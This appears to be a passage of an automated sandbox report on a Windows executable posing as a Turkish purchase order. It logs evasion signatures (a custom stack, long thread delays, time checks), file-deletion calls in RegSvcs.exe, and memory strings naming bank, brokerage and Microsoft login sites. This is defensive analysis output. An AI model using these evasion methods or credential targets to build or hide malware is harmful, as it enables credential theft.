                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeAPI/Special instruction interceptor: Address: 37E3214
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598087Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597482Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597353Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7989Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1861Jump to behavior
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100123
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeAPI coverage: 4.3 %
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_006B4696
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BC93C FindFirstFileW,FindClose,0_2_006BC93C
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_006BC9C7
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF200
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_006BF35D
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BF65E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3A2B
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_006B3D4E
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_006BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_006BBF27
                Source: C:\Users\user\Desktop\Sat#U0131nalma Sipari#U015fi Q4-2025-V5560001.exeCode function: 0_2_00654AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00654AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598087Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597482Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597353Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595438Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594063Jump to behavior
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: RegSvcs.exe, 00000002.00000002.3423035452.00000000012BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: RegSvcs.exe, 00000002.00000002.3424896751.0000000004112000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
